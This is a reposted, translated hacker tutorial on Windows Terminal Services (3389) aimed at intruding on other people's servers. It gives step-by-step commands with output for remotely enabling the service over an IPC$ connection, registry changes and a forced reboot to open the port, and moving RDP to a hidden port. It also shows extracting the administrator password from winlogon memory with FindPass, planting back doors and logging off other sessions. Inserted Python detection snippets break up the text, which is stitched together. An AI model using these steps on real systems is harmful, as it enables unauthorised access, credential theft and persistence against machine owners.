Terminal Service Guide

xiaoxiao2021-03-06  80

Actually this is not all original; much of it comes from the Internet and I have just re-edited it. Hello everyone.

First, introduction. Windows NT-series systems provide a special service, Terminal Services, commonly called the "3389 service" on the network. Some readers will surely say: isn't that the 3389 input method? I know it. That sentence is a big mistake: 3389 is not an input method, and 3389 does not necessarily have the input method vulnerability. It is a normal Windows service; only on an unpatched 3389 (Terminal Services) port can the input method vulnerability be used to break in, and that vulnerability is rare now. But very few people really understand Terminal Services thoroughly, so here I will give everyone a comprehensive look at it, to clear one more obstacle out of the way in network security.

Second, the concept of Terminal Services. Terminal Services overview

Terminal Services provides remote access to a server desktop through "thin client" software that acts as a terminal emulator. Terminal Services transmits only the user interface of a program to the client; the client then returns keyboard and mouse clicks to be processed by the server. Each user logs on and sees only their own session, which is managed transparently by the server operating system and is independent of any other client session. The client software can run on a number of client hardware devices, including computers and Windows-based terminals. Other devices, such as Macintosh computers or UNIX-based workstations, can also connect to a terminal server using additional third-party software.

Terminal Services can be configured on the server in application server mode or in remote administration mode. As an application server, Terminal Services provides an effective and reliable way to distribute Windows-based programs from a network server. In application server mode, Terminal Services delivers the Windows 2000 desktop and current Windows-based applications to computers that might not otherwise be able to run Windows. When used in remote administration mode, Terminal Services provides remote access so that you can administer your server from anywhere on the network.

Terminal services have the following benefits:

Deploy the Windows 2000 desktop faster. Terminal Services provides a bridge for migrating from older desktops to Windows 2000 Professional, for non-Windows desktops and for hardware that cannot be upgraded, by providing a virtual Windows 2000 desktop environment that works just like running the Windows 2000 operating system locally. Terminal Services can be used from a variety of desktop platforms, including MS-DOS, Windows-based terminals, Macintosh and UNIX. (Additional software is required to connect MS-DOS-, Macintosh- and UNIX-based computers.)

Take advantage of existing hardware. Terminal Services extends the distributed computing model by allowing computers to operate both as thin clients and as full-featured personal computers. Computers already on your network can continue to be used, and can act as thin clients that emulate a Windows 2000 Professional desktop.

Centralized deployment of programs. With Terminal Services running on Windows 2000 Server, all program execution, data processing and data storage take place on the server, and programs are deployed centrally. Terminal Services ensures that all clients use the current version of a program. Software is installed once on the server rather than on every desktop in your organization, which reduces the cost of updating individual computers.

Remote administration. Terminal Services provides remote administration of Windows 2000 Server, giving system administrators a way to manage their servers remotely from any client over a wide area network or a dial-up connection.

Why hackers like Terminal Services: mainly because of three features of Terminal Services: ease of use, manageability and security. These three features determine its position in the network. It is more powerful than any Trojan: with it, you effectively have full control of the other side's machine, and you can carry out every intrusion task that can be done on that machine (as long as your network is fast enough). This is no exaggeration.

Third, enabling Terminal Services. Using a tool to open 3389 needs no further words; there is not much technique in it. Here I mainly introduce two methods that open 3389 without any tool.

1. Use sc to open the other side's Terminal Services

First I need to confirm that the other side is 2000 Server. You can use the small tool CCA to look at the other side's users; if there is a TsInternetUser user, nine times out of ten it is Server.

C:\> cca 192.168.0.29 dudu dancewithsnow

Check Clone Account, by Netxeyes 2002/04/29 Written By Netxeyes 2002, Dansnow@21cn.com

Connect 192.168.0.29 .... ok prepairing .... ok processing .... ok checking ....

Check Result:

[DUDU] As Same As [Administrator]
[Guest] As Same As [Administrator]
[IUSR_RONG] As Same As [Administrator]
[IWAM_RONG] As Same As [Administrator]
[TEST] As Same As [Administrator]
[XR] As Same As [Administrator]

Obviously this is not a Server. Now look at the example:

C:\> net use \\xxx.xxx.xxx.xxx\ipc$ "password" /user:"name"

Step 1: check whether the other side's Terminal Services really is disabled.

C:\> sc \\xxx.xxx.xxx.xxx qc termservice
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: termservice
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 4   DISABLED
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WINNT\System32\termsrv.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Terminal Services
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Look at START_TYPE: it shows the other side's startup mode as 4 DISABLED, that is, disabled.

Step 2: change the startup mode of the other side's Terminal Services.

C:\> sc \\xxx.xxx.xxx.xxx config termservice start= auto

[SC] ChangeServiceConfig SUCCESS

OK, now we have changed the startup mode of the other side's Terminal Services to automatic.

Step 3: check the startup mode of the other side's Terminal Services again.

C:\> sc \\Test qc termservice
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: termservice
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WINNT\System32\termsrv.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Terminal Services
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

Look closely at START_TYPE: the other side's startup mode is now 2 AUTO_START, that is, automatic.

Step 4: start the other side's Terminal Services.

C:\> sc \\xxx.xxx.xxx.xxx start termservice

SERVICE_NAME: termservice
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2   START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0   (0x0)
        SERVICE_EXIT_CODE  : 0   (0x0)
        CHECKPOINT         : 0x1
        WAIT_HINT          : 0x7530

C:\> sc \\xxx.xxx.xxx.xxx query termservice

SERVICE_NAME: termservice
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4   RUNNING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0   (0x0)
        SERVICE_EXIT_CODE  : 0   (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

At this point the other side's 3389 has been started from the command line.
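As an added example (not code from the article), here is a Python parser for the text that sc qc prints, in the layout listed above, which flags exactly the change this walkthrough makes: TermService going from 4 DISABLED to 2 AUTO_START. The two snapshots are constructed to match the listings above.

```python
# Added example, not from the article: parse what "sc \\host qc <service>"
# prints (the layout shown above) and flag the change the walkthrough makes,
# TermService going from START_TYPE 4 DISABLED to 2 AUTO_START.
import re

START_TYPES = {"2": "AUTO_START", "3": "DEMAND_START", "4": "DISABLED"}

def parse_sc_qc(text):
    """Turn the 'KEY : value' lines of sc qc output into a dict."""
    info = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if m:
            info[m.group(1)] = m.group(2).strip()
    return info

def start_type_code(info):
    """Numeric START_TYPE code as a string ('4' for DISABLED), or None if absent."""
    fields = info.get("START_TYPE", "").split()
    return fields[0] if fields else None

def flag_termservice_change(before_text, after_text):
    """Compare two snapshots; report when TermService went from DISABLED to AUTO_START."""
    before, after = parse_sc_qc(before_text), parse_sc_qc(after_text)
    if before.get("SERVICE_NAME", "").lower() != "termservice":
        return None
    b, a = start_type_code(before), start_type_code(after)
    if b == "4" and a == "2":
        return f"TermService start type changed {START_TYPES[b]} -> {START_TYPES[a]}"
    return None

# Constructed snapshots matching the article's before/after listings.
BEFORE = """SERVICE_NAME: termservice
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 4   DISABLED
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\WINNT\\System32\\termsrv.exe
        SERVICE_START_NAME : LocalSystem
"""
AFTER = BEFORE.replace("4   DISABLED", "2   AUTO_START")

if __name__ == "__main__":
    print(flag_termservice_change(BEFORE, AFTER))
```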

2. Use remote registry modification. First open the Registry Editor, Registry - Connect Network Registry (you must first establish a null session with the other side), and change the following values:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\NetCache]
"Enabled"="0"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"

[HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TermService]
"Start"=dword:00000002

[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"

Then enter: shutdown \\xxx.xxx.xxx.xxx -r. After the other side restarts, the 3389 service is open.

Fourth, after getting in.

1. First, change the 3389 port. Modify the port setting on the server side; there are two places in the registry to change. The first is the PortNumber value under [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]; the default is 3389, change it to the port you want, for example 6000. The second place is the PortNumber value under [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]; the default is 3389, change it to the port you want, again 6000. Restart the system and it is done. Note: in fact, changing only the second place also works. Also, strictly speaking the second place is [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\...], where each subkey represents one specific RDP-Tcp connection. You can also download the small program C3389, http://www.haowa.com/down.c3389.zip, to change the port; after changing it, enter IP:port when logging in and you can log in.
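Added example, not part of the article: a Python audit of a registry export in .reg format that checks the values from the two registry sections above (the keys that switch Terminal Services on, and the PortNumber that moves RDP off 3389) against a baseline. The baseline values and the sample export are my assumptions, built from the key paths and values shown on this page.

```python
# Added example, not part of the article: audit a registry export (.reg-style
# text) for the values the two sections above change to switch Terminal
# Services on and to move RDP away from port 3389. Baseline values are an
# assumption: the article's "before" state (TermService disabled) and defaults.
import re

# (key-path suffix, value name) -> baseline value; paths are the ones on this page
BASELINE = {
    (r"control\terminal server", "tsenabled"): 0,
    (r"services\termservice", "start"): 4,       # 4 = DISABLED
    (r"services\termdd", "start"): 4,
    (r"policies\microsoft\windows\installer", "enableadmintsremote"): 0,
    (r"winstations\rdp-tcp", "portnumber"): 3389,
}

VALUE_LINE = re.compile(r'"([^"]+)"=(?:dword:([0-9a-fA-F]+)|"([^"]*)")')

def parse_reg(text):
    """Yield (key, name, value) triples; dword values are decoded from hex to int."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1].lower()
        elif key and line.startswith('"'):
            m = VALUE_LINE.match(line)
            if m:
                name, dword, string = m.groups()
                yield key, name.lower(), int(dword, 16) if dword is not None else string

def audit(text):
    """Return one finding per watched value that deviates from its baseline."""
    findings = []
    for key, name, value in parse_reg(text):
        for (suffix, wanted_name), baseline in BASELINE.items():
            if key.endswith(suffix) and name == wanted_name and value != baseline:
                findings.append(f"{key}\\{name} = {value} (baseline {baseline})")
    return findings

# Constructed export built from the key paths and values listed above (port 6000 = 0x1770).
SAMPLE = r"""[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\TermService]
"Start"=dword:00000002
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00001770
[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"
"""

if __name__ == "__main__":
    print("\n".join(audit(SAMPLE)))
```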

2. Get a secure account. Which account is the safest? An administrator's account, of course. Here you can use FINDPASS and Nern to grab NT/2000/XP passwords; since I have talked about the latter repeatedly, this time I will only talk about how to get the administrator account with FINDPASS. After downloading it from Xiaofengju there are two files, Findpass and Pulist; obviously these two files are used together. First run PULIST and find the PID value after winlogon.exe, here 204; note it down. Find the domain the administrator belongs to, here Shuangfeng\Administrator. Then run Findpass; the format is: findpass <machine name> <user name> <winlogon PID>. We enter: findpass Shuangfeng Administrator 204. Entering this line gives:

The logon information is: shuanfeng / administrator / 5201314

5201314 is the password.

3. Leave a back door. There are back doors online for everyone to choose from freely, but remember one thing: the bird that sticks its head out gets shot; the most popular back door is also the one most likely to be killed. As for how to hide back doors and keep them in place, I will explain that specially in the next Hacker Online.

Appendix:

1. Check who is logged on:

C:\> query user
 USERNAME   SESSIONNAME   ID  STATE         IDLE TIME  LOGON TIME
>w1         console       0   running       .          2002-1-19 2:37
 w1                       1   disconnected             2002-1-19 3:14

// What you see may be more than two RDP connections; this is just a demonstration for everyone. See? The user with ID 0 is a local logon; ID 1 is a 3389 logon that has been disconnected. Kick it off:

C:\> logoff 1

C:\> query user    // take another look
 USERNAME   SESSIONNAME   ID  STATE         IDLE TIME  LOGON TIME
>w1         console       0   running       .          2002-1-19 2:37

// Nothing there! You can go in!
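Added example, not from the article: a Python parser for the query user listing shown above, returning the session IDs that came in over 3389 (anything that is not the console) and which of those are sitting disconnected. It also accepts the Active/Disc state names that an English Windows prints; the sample listing is constructed to mirror the one above.

```python
# Added example, not from the article: parse the "query user" listing shown
# above and pick out the sessions that came in over 3389 (anything that is not
# the console), including the ones left sitting in a disconnected state.
# State names cover the article's translated listing and an English Windows.
import re

ROW = re.compile(r"^\s*(>?)\s*(\S+)\s+(?:(\S+)\s+)?(\d+)\s+(\S+)")
DISCONNECTED = {"disconnected", "disc"}

def parse_query_user(text):
    """Return one dict per session row: user, session, id, state, current."""
    rows = []
    for line in text.splitlines()[1:]:        # line 0 is the column header
        m = ROW.match(line)
        if m:
            current, user, session, sid, state = m.groups()
            rows.append({"user": user, "session": session or "", "id": int(sid),
                         "state": state.lower(), "current": current == ">"})
    return rows

def remote_sessions(text, disconnected_only=False):
    """IDs of non-console sessions; optionally only those that are disconnected."""
    return [r["id"] for r in parse_query_user(text)
            if r["session"].lower() != "console"
            and (not disconnected_only or r["state"] in DISCONNECTED)]

# Constructed listing mirroring the one above (session 1 is the lingering RDP logon).
SAMPLE = """ USERNAME   SESSIONNAME   ID  STATE         IDLE TIME  LOGON TIME
>w1         console       0   running       .          2002-1-19 2:37
 w1                       1   disconnected             2002-1-19 3:14
"""

if __name__ == "__main__":
    print(remote_sessions(SAMPLE, disconnected_only=True))
```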

2. Shortcut keys in 3389:

Ctrl+Alt+End: opens the Windows Security dialog box.
Alt+Page Up: switches between programs from left to right.
Alt+Page Down: switches between programs from right to left.
Alt+Insert: cycles through the programs in the order they were started.
Alt+Home: displays the Start menu.
Ctrl+Alt+Break: switches the client between a window (if applicable) and full-screen display.
Alt+Delete: displays the window's pop-up menu.
Ctrl+Alt+Minus (-): places a snapshot of the client's active window on the Terminal server clipboard (the same as pressing Alt+Print Screen on the local computer).
Ctrl+Alt+Plus (+): places a snapshot of the entire client window area on the Terminal server clipboard (the same as pressing Print Screen on the local computer).

Note: on NEC98 computers two of these shortcuts are different: Ctrl+Alt+Break is replaced by the F12 key, and Ctrl+Alt+End is replaced by the F15 key.

(End)

Please cite the original URL when reposting: https://www.9cbs.com/read-94626.html
